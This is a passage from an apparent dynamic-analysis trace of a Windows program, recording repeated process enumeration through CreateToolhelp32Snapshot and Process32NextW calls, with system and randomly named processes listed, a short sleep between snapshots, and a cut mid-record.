hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, 
dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="lsm.exe")) returned 1 [0104.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.029] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.029] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0105.030] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.031] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.032] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.033] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.035] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.036] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.037] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="explorer.exe")) returned 1 [0105.038] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.039] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.040] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.043] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0105.066] CloseHandle (hObject=0xbc) returned 1 [0105.066] Sleep (dwMilliseconds=0x12c) [0105.371] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0105.376] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0105.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.378] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0105.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0105.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0105.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.408] Process32NextW (in: 